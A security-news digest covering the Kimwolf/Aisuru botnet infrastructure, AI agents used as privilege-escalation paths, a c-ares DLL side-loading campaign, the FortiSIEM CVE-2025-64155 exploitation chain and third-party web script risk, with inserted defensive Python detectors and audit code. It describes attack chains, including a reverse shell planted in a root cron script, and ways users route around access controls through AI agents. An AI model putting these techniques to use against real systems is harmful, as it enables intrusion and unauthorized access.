2026-01-15 AI Startup News
Researchers Null-Route Over 550 Kimwolf and Aisuru Botnet Command Servers
The Black Lotus Labs team at Lumen Technologies said it null-routed traffic to more than 550 command-and-control (C2) nodes associated with the AISURU/Kimwolf botnet since early October 2025. AISURU and its Android counterpart, Kimwolf, have emerged as some of the biggest botnets in recent times, capable of directing enslaved devices to participate in distributed denial-of-service (DDoS) attacks and relay malicious traffic for residential proxy services. Details about Kimwolf emerged last month when QiAnXin XLab published an exhaustive analysis of the malware, which turns compromised devices – mostly unsanctioned Android TV streaming devices – into a residential proxy by delivering a software development kit (SDK) called ByteConnect either directly or through sketchy apps that come pre-installed on them. The net result is that the botnet has expanded to infect more than 2 million Android devices with an exposed Android Debug Bridge (ADB) service by tunneling through residential proxy networks, thereby allowing the threat actors to compromise a wide swath of TV boxes.
A subsequent report from Synthient has revealed Kimwolf actors attempting to offload proxy bandwidth in exchange for upfront cash. Black Lotus Labs said it identified in September 2025 a group of residential SSH connections originating from multiple Canadian IP addresses based on its analysis of backend C2 for Aisuru at 65.108.5[.]46, with the IP addresses using SSH to access 194.46.59[.]169, which is associated with proxy-sdk.14emeliaterracewestroxburyma02132[.]su. It’s worth noting that the second-level domain surpassed Google in Cloudflare’s list of top 100 domains in November 2025, prompting the web infrastructure company to scrub it from the list. Then, in early October 2025, the cybersecurity company said it identified another C2 domain – greatfirewallisacensorshiptool.14emeliaterracewestroxburyma02132[.]su – that resolved to 104.171.170[.]21, an IP address belonging to Utah-based hosting provider Resi Rack LLC.
The company advertises itself as a “Premium Game Server Hosting Provider.” This link is crucial, as a recent report from independent security journalist Brian Krebs revealed how people behind various proxy services based on the botnets were peddling their warez on a Discord server called resi[.]to. This also includes Resi Rack’s co-founders, who are said to have been actively engaged in selling proxy services via Discord for nearly two years. The server, which has since disappeared, was owned by someone named “d” (assessed to be short for the handle “Dort”), with Snow believed to be the botmaster. “In early October, we observed a 300% surge in the number of new bots added to Kimwolf over a 7-day period, which was the start of an increase that reached 800,000 total bots by mid-month,” Black Lotus Labs said.
“Nearly all of the bots in this surge were found listed for sale on a single residential proxy service.” Subsequently, the Kimwolf C2 architecture was found to scan PYPROXY and other services for vulnerable devices between October 20, 2025, and November 6, 2025 – a behavior explained by the botnet’s exploitation of a security flaw in many proxy services that made it possible to interact with devices on the internal networks of residential proxy endpoints and drop the malware. This, in turn, makes the device a residential proxy node, causing its public IP address (assigned by the Internet Service Provider) to be listed for rent on a residential proxy provider site. Threat actors, such as those behind these botnets, then lease access to the infected node and weaponize it to scan the local network for devices with ADB mode enabled for further propagation. “After one successful null route [in October 2025], we observed the greatfirewallisacensorshiptool domain move to 104.171.170[.]201, another Resi Rack LLC IP,” Black Lotus Labs noted.
“As this server stood up, we saw a large spike of traffic with 176.65.149[.]19:25565, a server used to host their malware. This was on a common ASN that was used by the Aisuru botnet at the same time.” The disclosure comes against the backdrop of a report from Chawkr that detailed a sophisticated proxy network containing 832 compromised KeeneticOS routers operating across Russian ISPs, such as Net By Net Holding LLC, VladLink, and GorodSamara. “The consistent SSH fingerprints and identical configurations across all 832 devices point toward automated mass exploitation, whether leveraging stolen credentials, embedded backdoors, or known security flaws in the router firmware,” it said. “Each compromised router maintains both HTTP (port 80) and SSH (port 22) access.” Given that these compromised SOHO routers function as residential proxy nodes, they provide threat actors with the ability to conduct malicious activities by blending into normal internet traffic.
This illustrates how adversaries are increasingly leveraging consumer devices as conduits for multi-stage attacks. “Unlike datacenter IPs or addresses from known hosting providers, these residential endpoints operate below the radar of most security vendor reputation lists and threat intelligence feeds,” Chawkr noted. “Their legitimate residential classification and clean IP reputation allow malicious traffic to masquerade as ordinary consumer activity, evading detection mechanisms that would immediately flag requests originating from suspicious hosting infrastructure or known proxy services.”
AI Agents Are Becoming Privilege Escalation Paths
AI agents have quickly moved from experimental tools to core components of daily workflows across security, engineering, IT, and operations. What began as individual productivity aids, like personal code assistants, chatbots, and copilots, has evolved into shared, organization-wide agents embedded in critical processes. These agents can orchestrate workflows across multiple systems, for example:
- An HR Agent that provisions or deprovisions accounts across IAM, SaaS apps, VPNs, and cloud platforms based on HR system updates.
- A Change Management Agent that validates a change request, updates configuration in production systems, logs approvals in ServiceNow, and updates documentation in Confluence.
- A Customer Support Agent that retrieves customer context from CRM, checks account status in billing systems, triggers fixes in backend services, and updates the support ticket.
To deliver value at scale, organizational AI agents are designed to serve many users and roles. They are granted broader access permissions, compared to individual users, in order to access the tools and data required to operate efficiently. The availability of these agents has unlocked real productivity gains: faster triage, reduced manual effort, and streamlined operations.
But these early wins come with a hidden cost. As AI agents become more powerful and more deeply integrated, they also become access intermediaries. Their wide permissions can obscure who is actually accessing what, and under which authority. In focusing on speed and automation, many organizations are overlooking the new access risks being introduced.
The Access Model Behind Organizational Agents
Organizational agents are typically designed to operate across many resources, serving multiple users, roles, and workflows through a single implementation. Rather than being tied to an individual user, these agents act as shared resources that can respond to requests, automate tasks, and orchestrate actions across systems on behalf of many users. This design makes agents easy to deploy and scalable across the organization. To function seamlessly, agents rely on shared service accounts, API keys, or OAuth grants to authenticate with the systems they interact with.
These credentials are often long-lived and centrally managed, allowing the agent to operate continuously without user involvement. To avoid friction and ensure the agent can handle a wide range of requests, permissions are frequently granted broadly, covering more systems, actions, and data than any single user would typically require. While this approach maximizes convenience and coverage, these design choices can unintentionally create powerful access intermediaries that bypass traditional permission boundaries.
Breaking the Traditional Access Control Model
Organizational agents often operate with permissions far broader than those granted to individual users, enabling them to span multiple systems and workflows.
When users interact with these agents, they no longer access systems directly; instead, they issue requests that the agent executes on their behalf. Those actions run under the agent’s identity, not the user’s. This breaks traditional access control models, where permissions are enforced at the user level. A user with limited access can indirectly trigger actions or retrieve data they would not be authorized to access directly, simply by going through the agent.
Because logs and audit trails attribute activity to the agent, not the requester, this privilege escalation can occur without clear visibility, accountability, or policy enforcement.
Organizational Agents Can Quietly Bypass Access Controls
The risks of agent-driven privilege escalation often surface in subtle, everyday workflows rather than overt abuse. For example, a user with limited access to financial systems may interact with an organizational AI agent to “summarize customer performance.” The agent, operating with broader permissions, pulls data from billing, CRM, and finance platforms, returning insights that the user would not be authorized to view directly. In another scenario, an engineer without production access asks an AI agent to “fix a deployment issue.” The agent investigates logs, modifies configuration in a production environment, and triggers a pipeline restart using its own elevated credentials.
The user never touched production systems, yet production was changed on their behalf. In both cases, no explicit policy is violated. The agent is authorized, the request appears legitimate, and existing IAM controls are technically enforced. However, access controls are effectively bypassed because authorization is evaluated at the agent level, not the user level, creating unintended and often invisible privilege escalation.
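The two scenarios above, as an added example that is not from Wing Security or this article: a minimal task dispatcher in which each step must fall inside both the agent's grant and the requester's own entitlement (so the audit record names the human, not just the agent), plus a helper that surfaces the permission gap (agent access minus user access) that the article says security teams need to see. All users, systems and permissions are constructed.

```python
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

# A permission is a (system, action) pair, e.g. ("finance", "read").
Permission = Tuple[str, str]

# Constructed entitlements; a real deployment would pull these from IAM.
USER_PERMISSIONS: Dict[str, Set[Permission]] = {
    "analyst":  {("crm", "read")},
    "engineer": {("logs", "read"), ("staging", "deploy")},
    "sre":      {("logs", "read"), ("production", "write_config"), ("production", "deploy")},
}

# The shared agent's service account: broader than any single user (constructed).
AGENT_PERMISSIONS: Set[Permission] = {
    ("crm", "read"), ("billing", "read"), ("finance", "read"),
    ("logs", "read"), ("production", "write_config"), ("production", "deploy"),
}

# Constructed mapping of the two tasks from the article to the permissions they touch.
TASK_PERMISSIONS: Dict[str, List[Permission]] = {
    "summarize customer performance": [("crm", "read"), ("billing", "read"), ("finance", "read")],
    "fix deployment issue": [("logs", "read"), ("production", "write_config"), ("production", "deploy")],
}


@dataclass
class AuditRecord:
    requester: str          # the human (or upstream identity) behind the request
    agent: str              # the agent identity the action ran under
    permission: Permission
    allowed: bool


AUDIT_LOG: List[AuditRecord] = []


def agent_level_authorize(permission: Permission) -> bool:
    """The problematic model: only the agent's grant is consulted, so any user
    who can talk to the agent reaches everything the agent can."""
    return permission in AGENT_PERMISSIONS


def user_context_authorize(requester: str, agent: str, permission: Permission) -> bool:
    """Hardened model: the action must be inside BOTH the agent's grant and the
    requester's own entitlement, and the audit record names the requester."""
    allowed = (permission in AGENT_PERMISSIONS
               and permission in USER_PERMISSIONS.get(requester, set()))
    AUDIT_LOG.append(AuditRecord(requester, agent, permission, allowed))
    return allowed


def run_task(requester: str, task: str, agent: str = "ops-agent") -> Dict[str, List[Permission]]:
    """Dispatch a task step by step under the hardened model; returns which
    steps ran and which were denied for this requester."""
    result: Dict[str, List[Permission]] = {"executed": [], "denied": []}
    for perm in TASK_PERMISSIONS[task]:
        bucket = "executed" if user_context_authorize(requester, agent, perm) else "denied"
        result[bucket].append(perm)
    return result


def escalation_paths(user_perms: Dict[str, Set[Permission]],
                     agent_perms: Set[Permission]) -> Dict[str, Set[Permission]]:
    """For each user, the permissions reachable through the agent that the user
    does not hold directly: the gap the article says teams must surface."""
    return {user: agent_perms - perms
            for user, perms in user_perms.items() if agent_perms - perms}


if __name__ == "__main__":
    print(run_task("analyst", "summarize customer performance"))
    print(run_task("engineer", "fix deployment issue"))
    for user, gap in escalation_paths(USER_PERMISSIONS, AGENT_PERMISSIONS).items():
        print(f"{user}: reachable only through the agent -> {sorted(gap)}")
```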
The Limits of Traditional Access Controls in the Age of AI Agents
Traditional security controls are built around human users and direct system access, which makes them poorly suited for agent-mediated workflows. IAM systems enforce permissions based on who the user is, but when actions are executed by an AI agent, authorization is evaluated against the agent’s identity, not the requester’s. As a result, user-level restrictions no longer apply. Logging and audit trails compound the problem by attributing activity to the agent’s identity, masking who initiated the action and why.
With agents, security teams have lost the ability to enforce least privilege, detect misuse, or reliably attribute intent, allowing privilege escalation to occur without triggering traditional controls. The lack of attribution also complicates investigations, slows incident response, and makes it difficult to determine intent or scope during a security event.
Uncovering Privilege Escalation in Agent-Centric Access Models
As organizational AI agents take on operational responsibilities across multiple systems, security teams need clear visibility into how agent identities map to critical assets such as sensitive data and operational systems. It’s essential to understand who is using each agent and whether gaps exist between a user’s permissions and the agent’s broader access, creating unintended privilege escalation paths.
Without this context, excessive access can remain hidden and unchallenged. Security teams must also continuously monitor changes to both user and agent permissions, as access evolves over time. This ongoing visibility is critical to identifying new escalation paths as they are silently introduced, before they can be misused or lead to security incidents.
Securing Agents’ Adoption with Wing Security
AI agents are rapidly becoming some of the most powerful actors in the enterprise.
They automate complex workflows, move across systems, and act on behalf of many users at machine speed. But that power becomes dangerous when agents are over-trusted. Broad permissions, shared usage, and limited visibility can quietly turn AI agents into privilege escalation paths and security blind spots. Secure agent adoption requires visibility, identity awareness, and continuous monitoring.
Wing provides the required visibility by continuously discovering which AI agents operate in your environment, what they can access, and how they are being used. Wing maps agent access to critical assets, correlates agent activity with user context, and detects gaps where agent permissions exceed user authorization. With Wing, organizations can embrace AI agents confidently, unlocking AI automation and efficiency without sacrificing control, accountability, or security.
This article is a contributed piece from one of our valued partners.
Hackers Exploit c-ares DLL Side-Loading to Bypass Security and Deploy Malware
Security experts have disclosed details of an active malware campaign that’s exploiting a DLL side-loading vulnerability in a legitimate binary associated with the open-source c-ares library to bypass security controls and deliver a wide range of commodity trojans and stealers. “Attackers achieve evasion by pairing a malicious libcares-2.dll with any signed version of the legitimate ahost.exe (which they often rename) to execute their code,” Trellix said in a report shared with The Hacker News. “This DLL side-loading technique allows the malware to bypass traditional signature-based security defenses.” The campaign has been observed distributing a wide assortment of malware, such as Agent Tesla , CryptBot , Formbook , Lumma Stealer , Vidar Stealer , Remcos RAT , Quasar RAT , DCRat , and XWorm . Targets of the malicious activity include employees in finance, procurement, supply chain, and administration roles within commercial and industrial sectors like oil and gas and import and export, with lures written in Arabic, Spanish, Portuguese, Farsi, and English, suggesting the attacks are restricted to a specific region.
The attack hinges on placing a malicious version of the DLL in the same directory as the vulnerable binary, taking advantage of the fact that it’s susceptible to search order hijacking to execute the contents of the rogue DLL instead of its legitimate counterpart, granting the threat actor code execution capabilities. The “ahost.exe” executable used in the campaign is signed by GitKraken and is typically distributed as part of GitKraken’s Desktop application. An analysis of the artifact on VirusTotal reveals that it’s distributed under dozens of names, including, but not limited to, “RFQ_NO_04958_LG2049 pdf.exe,” “PO-069709-MQ02959-Order-S103509.exe,” “23RDJANUARY OVERDUE.INV.PDF.exe,” “sales contract po-00423-025_pdf.exe,” and “Fatura da DHL.exe,” indicating the use of invoice and request for quote (RFQ) themes to trick users into opening it. “This malware campaign highlights the growing threat of DLL sideloading attacks that exploit trusted, signed utilities like GitKraken’s ahost.exe to bypass security defenses,” Trellix said.
“By leveraging legitimate software and abusing its DLL loading process, threat actors can stealthily deploy powerful malware such as XWorm and DCRat, enabling persistent remote access and data theft.” The disclosure comes as Trellix also reported a surge in Facebook phishing scams employing the Browser-in-the-Browser ( BitB ) technique to simulate a Facebook authentication screen and deceive unsuspecting users into entering their credentials. This works by creating a fake pop-up within the victim’s legitimate browser window using an iframe element, making it virtually impossible to differentiate between a genuine and bogus login page. “The attack often starts with a phishing email, which may be disguised as a communication from a law firm,” researcher Mark Joseph Marti said . “This email typically contains a fake legal notice regarding an infringing video and includes a hyperlink disguised as a Facebook login link.” As soon as the victim clicks on the shortened URL, they are redirected to a phony Meta CAPTCHA prompt that instructs victims to sign in to their Facebook account.
This, in turn, triggers a pop-up window that employs the BitB method to display a fake login screen designed to harvest their credentials. Other variants of the social engineering campaign leverage phishing emails claiming copyright violations, unusual login alerts, impending account shutdowns due to suspicious activity, or potential security exploits. These messages are designed to induce a false sense of urgency and lead victims to pages hosted on Netlify or Vercel to capture their credentials. There is evidence to suggest that the phishing attacks may have been ongoing since July 2025 .
“By creating a custom-built, fake login pop-up window within the victim’s browser, this method capitalizes on user familiarity with authentication flows, making credential theft nearly impossible to detect visually,” Trellix said. “The key shift lies in the abuse of trusted infrastructure, utilizing legitimate cloud hosting services like Netlify and Vercel, and URL shorteners to bypass traditional security filters and lend a false sense of security to phishing pages.” The findings coincide with the discovery of a multi-stage phishing campaign that exploits Python payloads and TryCloudflare tunnels to distribute AsyncRAT via Dropbox links pointing to ZIP archives containing an internet shortcut (URL) file. Details of the campaign were first documented by Forcepoint X-Labs in February 2025. “The initial payload, a Windows Script Host (WSH) file, was designed to download and execute additional malicious scripts hosted on a WebDAV server,” Trend Micro said.
“These scripts facilitated the download of batch files and further payloads, ensuring a seamless and persistent infection routine.” A standout aspect of the attack is the abuse of living-off-the-land (LotL) techniques that employ Windows Script Host, PowerShell, and native utilities, as well as Cloudflare’s free-tier infrastructure to host the WebDAV server and evade detection. The scripts staged on TryCloudflare domains are engineered to install a Python environment, establish persistence via Windows startup folder scripts, and inject the AsyncRAT shellcode into an “explorer.exe” process. In tandem, a decoy PDF is displayed to the victim as a distraction mechanism and misleads them into thinking that a legitimate document was accessed. “The AsyncRAT campaign analyzed in this report demonstrates the increasing sophistication of threat actors in abusing legitimate services and open-source tools to evade detection and establish persistent remote access,” Trend Micro said.
“By utilizing Python-based scripts and abusing Cloudflare’s free-tier infrastructure for hosting malicious payloads, the attackers successfully masked their activities under trusted domains, bypassing traditional security controls.”
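An added hunting example for the c-ares side-loading pattern described at the top of this article (not Trellix's code): it flags a process whose PE version resource still says ahost.exe while its on-disk name differs, a libcares-2.dll loaded from the executable's own directory outside an expected install location, and invoice/RFQ-style double-extension file names. The event records, the Sysmon-style field names and the GitKraken install paths are assumptions of this example.

```python
import ntpath
import re
from fnmatch import fnmatchcase
from typing import Dict, List

HOST_BINARY = "ahost.exe"        # signed GitKraken utility abused as the side-loading host
SIDELOAD_DLL = "libcares-2.dll"  # the DLL the campaign drops next to it

# Assumed legitimate install locations for GitKraken's ahost.exe; tune to your fleet.
EXPECTED_DIRS = (r"c:\program files\gitkraken*", r"c:\users\*\appdata\local\gitkraken*")

# Invoice / RFQ themed names ending in a document-looking double extension.
LURE_NAME = re.compile(r"[._ -](pdf|docx?|xlsx?|inv)\.exe$", re.IGNORECASE)


def in_expected_dir(path: str) -> bool:
    """True when the file sits under one of the known-good install directories."""
    directory = ntpath.dirname(path).lower()
    return any(fnmatchcase(directory, pattern) for pattern in EXPECTED_DIRS)


def analyze(events: List[Dict]) -> List[Dict]:
    """Return one finding per suspicious signal in a stream of process-creation
    (EventID 1) and image-load (EventID 7) records."""
    findings = []
    for ev in events:
        image = ev.get("Image", "")
        image_name = ntpath.basename(image).lower()
        if ev.get("EventID") == 1 and ev.get("OriginalFileName", "").lower() == HOST_BINARY:
            # The PE version resource still says ahost.exe even after a rename on disk.
            if image_name != HOST_BINARY:
                findings.append({"rule": "renamed-ahost", "image": image})
            elif not in_expected_dir(image):
                findings.append({"rule": "ahost-outside-install-dir", "image": image})
            if LURE_NAME.search(image_name):
                findings.append({"rule": "lure-filename", "image": image})
        elif ev.get("EventID") == 7:
            loaded = ev.get("ImageLoaded", "")
            same_dir = ntpath.dirname(loaded).lower() == ntpath.dirname(image).lower()
            # Side-loading needs the DLL beside the host; flag it outside known install dirs.
            if (ntpath.basename(loaded).lower() == SIDELOAD_DLL
                    and same_dir and not in_expected_dir(loaded)):
                findings.append({"rule": "sideload-dll", "image": image, "dll": loaded})
    return findings


# Constructed events; a benign GitKraken launch followed by a renamed copy in Downloads.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Program Files\GitKraken\ahost.exe",
     "OriginalFileName": "ahost.exe", "Signature": "GitKraken"},
    {"EventID": 7, "Image": r"C:\Program Files\GitKraken\ahost.exe",
     "ImageLoaded": r"C:\Program Files\GitKraken\libcares-2.dll"},
    {"EventID": 1, "Image": r"C:\Users\bob\Downloads\RFQ_NO_04958_LG2049 pdf.exe",
     "OriginalFileName": "ahost.exe", "Signature": "GitKraken"},
    {"EventID": 7, "Image": r"C:\Users\bob\Downloads\RFQ_NO_04958_LG2049 pdf.exe",
     "ImageLoaded": r"C:\Users\bob\Downloads\libcares-2.dll"},
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```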
Fortinet Fixes Critical FortiSIEM Flaw Allowing Unauthenticated Remote Code Execution
Fortinet has released updates to fix a critical security flaw impacting FortiSIEM that could allow an unauthenticated attacker to achieve code execution on susceptible instances. The operating system (OS) injection vulnerability, tracked as CVE-2025-64155, is rated 9.4 out of 10.0 on the CVSS scoring system. “An improper neutralization of special elements used in an OS command (‘OS command injection’) vulnerability [CWE-78] in FortiSIEM may allow an unauthenticated attacker to execute unauthorized code or commands via crafted TCP requests,” the company said in a Tuesday bulletin. Fortinet said the vulnerability affects only Super and Worker nodes, and that it has been addressed in the following versions:
- FortiSIEM 6.7.0 through 6.7.10 (Migrate to a fixed release)
- FortiSIEM 7.0.0 through 7.0.4 (Migrate to a fixed release)
- FortiSIEM 7.1.0 through 7.1.8 (Upgrade to 7.1.9 or above)
- FortiSIEM 7.2.0 through 7.2.6 (Upgrade to 7.2.7 or above)
- FortiSIEM 7.3.0 through 7.3.4 (Upgrade to 7.3.5 or above)
- FortiSIEM 7.4.0 (Upgrade to 7.4.1 or above)
- FortiSIEM 7.5 (Not affected)
- FortiSIEM Cloud (Not affected)
Horizon3.ai security researcher Zach Hanley, who is credited with discovering and reporting the flaw on August 14, 2025, said it comprises two moving parts:
- An unauthenticated argument injection vulnerability that leads to arbitrary file write, allowing for remote code execution as the admin user
- A file overwrite privilege escalation vulnerability that leads to root access and completely compromises the appliance
Specifically, the problem has to do with how FortiSIEM’s phMonitor service – a crucial backend process responsible for health monitoring, task distribution, and inter-node communication via TCP port 7900 – handles incoming requests related to logging security events to Elasticsearch.
This, in turn, invokes a shell script with user-controlled parameters, thereby opening the door to argument injection via curl and achieving arbitrary file writes to the disk in the context of the admin user. This limited file write can be turned into a full system takeover by using the curl argument injection to write a reverse shell to “/opt/charting/redishb.sh,” a file that’s writable by an admin user and is executed every minute by the appliance by means of a cron job that runs with root-level permissions. In other words, writing a reverse shell to this file enables privilege escalation from admin to root, granting the attacker unfettered access to the FortiSIEM appliance. The most important aspect of the attack is that the phMonitor service exposes several command handlers that do not require authentication.
This makes it easy for an attacker to invoke these functions simply by obtaining network access to port 7900. Fortinet has also shipped fixes for another critical security vulnerability in FortiFone (CVE-2025-47855, CVSS score: 9.3) that could allow an unauthenticated attacker to obtain device configuration via a specially crafted HTTP(S) request to the Web Portal page. It impacts the following versions of the enterprise communications platform:
- FortiFone 3.0.13 through 3.0.23 (Upgrade to 3.0.24 or above)
- FortiFone 7.0.0 through 7.0.1 (Upgrade to 7.0.2 or above)
- FortiFone 7.2 (Not affected)
Users are advised to update to the latest versions for optimal protection. As workarounds for CVE-2025-64155, Fortinet is recommending that customers limit access to the phMonitor port (7900).
New Research: 64% of 3rd-Party Applications Access Sensitive Data Without Justification
Research analyzing 4,700 leading websites reveals that 64% of third-party applications now access sensitive data without business justification, up from 51% in 2024. Government sector malicious activity spiked from 2% to 12.9%, while 1 in 7 Education sites show active compromise. Specific offenders: Google Tag Manager (8% of violations), Shopify (5%), Facebook Pixel (4%).
TL;DR
A critical disconnect emerges in the 2026 research: While 81% of security leaders call web attacks a top priority, only 39% have deployed solutions to stop the bleeding.
Last year’s research found 51% unjustified access. This year it’s 64% — and accelerating into public infrastructure.
What is Web Exposure?
Gartner coined ‘Web Exposure Management’ to describe security risks from third-party applications: analytics, marketing pixels, CDNs, and payment tools.
Each connection expands your attack surface; a single vendor compromise can trigger a massive data breach by injecting code to harvest credentials or skim payments. This risk is fueled by a governance gap, where marketing or digital teams deploy apps without IT oversight. The result is chronic misconfiguration, where over-permissioned applications are granted access to sensitive data fields they don’t functionally need. This research analyzes exactly what data these third-party apps touch and whether they have a legitimate business justification.
Methodology
Over 12 months (ending Nov. 2025), Reflectiz analyzed 4,700 leading websites using its proprietary Exposure Rating system. It analyzes the huge number of data points it gathers from scanning millions of websites by considering each risk factor in context, adds them together to create an overall level of risk, and expresses this as a simple grade, from A to F. Findings were supplemented by a survey of 120+ security leaders in the healthcare, finance, and retail sectors.
The Unjustified Access Crisis
The report highlights a growing governance gap termed “unjustified access”: instances where third-party tools are granted access to sensitive data without a demonstrable business need. Access is flagged when a third-party script meets any of these criteria:
- Irrelevant Function: Reading data unnecessary for its task (e.g., a chatbot accessing payment fields).
- Zero-ROI Presence: Remaining active on high-risk pages despite 90+ days of zero data transmission.
- Shadow Deployment: Injection via Tag Managers without security oversight or “least privilege” scoping.
- Over-Permissioning: Utilizing “Full DOM Access” to scrape entire pages rather than restricted elements.
“Organizations are granting sensitive data access by default rather than exception.” This trend is most acute in Entertainment and Online Retail, where marketing pressures often override security reviews. The study identifies specific tools driving this exposure:
- Google Tag Manager: Accounts for 8% of all unjustified sensitive data access.
- Shopify: 5% of unjustified access.
- Facebook Pixel: In 4% of analyzed deployments, the pixel was found to be over-permissioned, capturing sensitive input fields it did not require for functional tracking.
This governance gap isn’t theoretical. A recent survey of 120+ security decision-makers from healthcare, finance, and retail found that 24% of organizations rely solely on general security tools like WAF, leaving them vulnerable to the specific third-party risks this research identified. Another 34% are still evaluating dedicated solutions, meaning 58% of organizations lack proper defenses despite recognizing the threat.
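An added example (not Reflectiz's tooling) that applies the four unjustified-access criteria above to a constructed third-party script inventory, and also scores the site-level compromise indicators the report lists later (recently registered domains, external-connection count, mixed content). The script attributes, the purpose-to-fields policy and the numeric thresholds are assumptions of this example.

```python
from dataclasses import dataclass, field
from typing import Dict, List

SENSITIVE_FIELDS = {"card_number", "cvv", "ssn", "password", "email"}
# Which script purposes legitimately need which sensitive fields (constructed policy).
JUSTIFIED_SENSITIVE = {"payment": {"card_number", "cvv"}, "auth": {"password", "email"}}
HIGH_RISK_PAGES = {"payment", "login"}
ZERO_ROI_DAYS = 90            # report: 90+ days of zero data transmission on a high-risk page
RECENT_DOMAIN_DAYS = 180      # report: registered within the last 6 months (approximated)
CLEAN_SITE_EXTERNAL_AVG = 36  # report: 36 external domains on clean sites vs 100 on compromised


@dataclass
class ThirdPartyScript:
    vendor: str
    domain: str
    page_type: str                          # "landing", "payment", "login", ...
    purpose: str                            # "chatbot", "pixel", "analytics", "cdn", "payment", ...
    fields_read: List[str] = field(default_factory=list)
    full_dom_access: bool = False
    days_since_last_transmission: int = 0
    injected_via_tag_manager: bool = False
    tag_manager_scoped: bool = True         # least-privilege scoping and review applied
    domain_age_days: int = 3650
    scheme: str = "https"


def unjustified_access_flags(s: ThirdPartyScript) -> List[str]:
    """Apply the report's four criteria to one script; returns the ones it trips."""
    flags = []
    if (set(s.fields_read) & SENSITIVE_FIELDS) - JUSTIFIED_SENSITIVE.get(s.purpose, set()):
        flags.append("irrelevant_function")   # reads data its task does not need
    if s.page_type in HIGH_RISK_PAGES and s.days_since_last_transmission >= ZERO_ROI_DAYS:
        flags.append("zero_roi_presence")     # idle on a high-risk page
    if s.injected_via_tag_manager and not s.tag_manager_scoped:
        flags.append("shadow_deployment")     # tag-manager injection without oversight
    if s.full_dom_access:
        flags.append("over_permissioning")    # can scrape the whole page
    return flags


def is_first_party(domain: str, site_domain: str) -> bool:
    return domain == site_domain or domain.endswith("." + site_domain)


def compromise_indicators(site_domain: str, site_scheme: str,
                          scripts: List[ThirdPartyScript]) -> Dict[str, object]:
    """Site-level signals the report associates with compromised sites."""
    external = [s for s in scripts if not is_first_party(s.domain, site_domain)]
    domains = {s.domain for s in external}
    recent = sorted({s.domain for s in external if s.domain_age_days < RECENT_DOMAIN_DAYS})
    mixed = site_scheme == "https" and any(s.scheme == "http" for s in scripts)
    return {
        "external_domains": len(domains),
        "above_clean_site_average": len(domains) > CLEAN_SITE_EXTERNAL_AVG,
        "recently_registered": recent,
        "mixed_content": mixed,
    }


def audit_site(site_domain: str, site_scheme: str, scripts: List[ThirdPartyScript]) -> Dict:
    return {
        "unjustified_access": {s.vendor: unjustified_access_flags(s) for s in scripts},
        "indicators": compromise_indicators(site_domain, site_scheme, scripts),
    }


# Constructed inventory for a fictional shop.example storefront.
SAMPLE_SCRIPTS = [
    ThirdPartyScript("SupportBot", "widget.supportbot.example", "payment", "chatbot",
                     fields_read=["name", "card_number"], days_since_last_transmission=2),
    ThirdPartyScript("AdPixel", "px.adnet.example", "payment", "pixel",
                     fields_read=["email"], full_dom_access=True,
                     injected_via_tag_manager=True, tag_manager_scoped=False),
    ThirdPartyScript("StatsCo", "stats.statsco.example", "login", "analytics",
                     days_since_last_transmission=120, injected_via_tag_manager=True),
    ThirdPartyScript("NewCDN", "cdn.fresh-vendor.example", "landing", "cdn",
                     domain_age_days=30, scheme="http"),
    ThirdPartyScript("Checkout", "pay.shop.example", "payment", "payment",
                     fields_read=["card_number", "cvv"]),
]

if __name__ == "__main__":
    import json
    print(json.dumps(audit_site("shop.example", "https", SAMPLE_SCRIPTS), indent=2))
```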
Critical Infrastructure Under Siege
While the stats show massive spikes in Government and Education breaches, the cause is financial rather than technical.
- Government Sector: Malicious activity exploded from 2% to 12.9%.
- Education Sector: Signs of compromised sites quadrupled to 14.3% (1 in 7 sites).
- Insurance Sector: By contrast, this sector reduced malicious activity by 60%, dropping to just 1.3%.
Budget-constrained institutions are losing the supply chain battle.
Private sectors with better governance budgets are stabilizing their environments. Survey respondents confirmed this: 34% cited budget constraints as their primary obstacle, while 31% pointed to lack of manpower – a combination that hits public institutions particularly hard.
The Awareness-Action Gap
Security leader survey findings expose organizational dysfunction:
- 81% call web attacks a priority → Only 39% deployed solutions
- 61% still evaluating or using inadequate tools → Despite 51% → 64% unjustified access surge
- Top obstacles: Budget (34%), regulation (32%), staffing (31%)
Result: Awareness without action creates vulnerability at scale. The 42-point gap explains why unjustified access grows 25% year-over-year.
The Marketing Department Factor
A key driver of this risk is the “Marketing Footprint.” The research found that Marketing and Digital departments now drive 43% of all third-party risk exposure, compared to just 19% created by IT. The report found that 47% of apps running in payment frames lack business justification. Marketing teams frequently deploy conversion tools into these sensitive environments without realizing the implications. Security teams recognize this threat: in the practitioner survey, 20% of respondents ranked supply chain attacks and third-party script vulnerabilities among their top three concerns.
Yet the organizational structure that would prevent these risks – unified oversight of third-party deployments – remains absent at most organizations.
How a Pixel Breach Could Eclipse Polyfill.io
With 53.2% ubiquity, the Facebook Pixel is a systemic single point of failure. The risk is not the tool, but unmanaged permissions: “Full DOM Access” and “Automatic Advanced Matching” transform marketing pixels into unintentional data scrapers. The Precedent: A compromise would be 5x larger than the 2024 Polyfill.io attack, exposing data across half the major web simultaneously.
Polyfill affected 100K sites over weeks; Facebook Pixel’s 53.2% ubiquity means 2.5M+ sites are compromised instantly. The Fix: Context-Aware Deployment. Restrict pixels to landing pages for ROI, but strictly block them from payment and credential frames where they lack business justification. What about TikTok pixel and other trackers?
Technical Indicators of Compromise
For the first time, this research pinpoints technical signals that predict compromised sites. Compromised sites don’t always use malicious apps – they’re characterized by “noisier” configurations. Automated Detection Criteria:
- Recently Registered Domains: Domains registered within the last 6 months appear 3.8x more often on compromised sites.
- External Connections: Compromised sites connect to 2.7x more external domains (100 vs. 36).
- Mixed Content: 63% of compromised sites mix HTTPS/HTTP protocols.
Benchmarks for Security Leaders
Among the 4,700 analyzed sites, 429 demonstrated strong security outcomes. These organizations prove that functionality and security can coexist:
- ticketweb.uk: Only site meeting all 8 benchmarks (Grade A+)
- GitHub, PayPal, Yale University: Meeting 7 benchmarks (Grade A)
The 8 Security Benchmarks: Leaders vs Average
The benchmarks below represent achievable targets based on real-world performance, not theoretical ideals.
Leaders maintain ≤8 third-party apps, while average organizations struggle with 15-25. The difference isn’t resources – it’s governance. Here’s how they compare across all eight metrics:
Three Quick Wins To Prioritize
1. Audit Trackers
Inventory every pixel/tracker: identify the owner and business justification, and remove tools that can’t justify data access. Priority fixes:
- Facebook Pixel: Disable ‘Automatic Advanced Matching’ on PII pages
- Google Tag Manager: Verify no payment page access
- Shopify: Review app permissions
